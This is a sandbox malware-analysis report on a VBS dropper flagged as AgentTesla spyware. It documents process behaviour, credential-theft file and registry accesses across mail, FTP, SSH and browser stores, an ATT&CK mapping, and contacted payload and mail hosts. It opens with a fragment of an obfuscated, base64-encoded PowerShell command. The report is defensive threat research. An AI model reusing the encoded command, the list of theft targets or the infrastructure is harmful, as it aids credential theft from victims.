CgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAgAFUAbgBSAFAAbABlAEEAZgB0AFMAawByAFcAcgApAE8AcAA7AAoARwBsAFsAVABhAEQAVABlAGwASABvAGwAQQBuAEkARABvAG0AUwBuAHAATgBvAG8AYQB1AHIAUwBrAHQATwBjACgARwBsACIATABpAHcASAB5AGkAUwBhAG4ATwBiAG0AYQBjAG0AQgBhAC4AUwBtAGQAcABoAGwATwBuAGwAUABhACIAYQBsACkARQB4AF0AQQByAHAATQBvAHUAUwBpAGIAQQBhAGwAVABlAGkARABpAGMAUgBpACAAUwB0AHMARABlAHQATQBlAGEAQwB1AHQAQgBlAGkAVABoAGMATABhACAAQwBvAGUARABhAHgARQByAHQAdABvAGUAVABhAHIAQQBtAG4AUgB1ACAAQQByAGkARwByAG4ARwByAHQATABvACAAaABlAEcATABlAGUAVABhAHQAQQBxAEQARQBrAHIATQB5AGkARABvAHYAagBvAGUASABvAHIATA	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA2B2.tmp" "c:\Users\user\AppData\Local\Temp\sepi5xx1\CSC7F7A267C826A46D5AA3589EC91649B9.TMP"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 20_2_0850DE20 CreateNamedPipeW,

20_2_0850DE20

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Source: Yara match	File source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6564, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	221 Scripting	Boot or Logon Initialization Scripts	212 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	115 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	221 Scripting	1 Credentials in Registry	321 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 PowerShell	Logon Script (Mac)	Logon Script (Mac)	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	11 Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	251 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	251 Virtualization/Sandbox Evasion	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PUMP mt310143121.vbs	2%	ReversingLabs
PUMP mt310143121.vbs	8%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
mail.prgisi.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	100%	Avira URL Cloud	malware
https://contoso.com/License	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	Virustotal		Browse
https://contoso.com/License	0%	Virustotal		Browse
https://contoso.com/Icon	0%	Avira URL Cloud	safe
http://mail.prgisi.com	0%	Avira URL Cloud	safe
https://api.ipify.org%mail.prgisi.comjcvaleroso	0%	Avira URL Cloud	safe
https://sectigo.com/CPS	0%	Avira URL Cloud	safe
https://a1BgY4r4bA.comt-	0%	Avira URL Cloud	safe
https://contoso.com/	0%	Avira URL Cloud	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	Avira URL Cloud	safe
https://a1BgY4r4bA.com	0%	Avira URL Cloud	safe
https://api.ipify.org%	0%	Avira URL Cloud	safe
http://AzAPmg.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.186.46	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.161	true	false		high
mail.prgisi.com	216.218.206.36	true	false	0%, Virustotal, Browse	unknown
doc-04-9o-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-04-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614/*/1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://nuget.org/NuGet.exe	powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5813910311.000000002107C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://drive.google.com/y	CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mail.prgisi.com	CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org%mail.prgisi.comjcvaleroso	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://doc-04-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6h	CasPol.exe, 0000001A.00000002.5720812627.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2072883437.0000000001531000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2066142998.00000000014F1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5727289842.0000000001531000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS	CasPol.exe, 0000001A.00000002.5814855176.0000000021096000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://a1BgY4r4bA.comt-	CasPol.exe, 0000001A.00000002.5768599298.000000001DCE6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://aka.ms/pscore6lB	powershell.exe, 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-04-9o-docs.googleusercontent.com/	CasPol.exe, 0000001A.00000003.2072435740.000000000151A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5716278615.00000000014A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://a1BgY4r4bA.com	CasPol.exe, 0000001A.00000002.5768599298.000000001DCE6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5766354780.000000001DCAA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org%	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://AzAPmg.com	CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.46	drive.google.com	United States	15169	GOOGLEUS	false
142.250.185.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
216.218.206.36	mail.prgisi.com	United States	36103	CENTRALUTAHUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	715071
Start date and time:	2022-10-03 16:07:48 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PUMP mt310143121.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winVBS@12/12@3/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 228 Number of non-executed functions: 20
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.117.96.136, 13.107.5.88
Excluded domains from analysis (whitelisted): evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, e-0009.e-msedge.net, wdcp.microsoft.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, login.live.com, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, img-prod-cms-rt-microsoft-com.akamaized.net, manage.devcenter.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
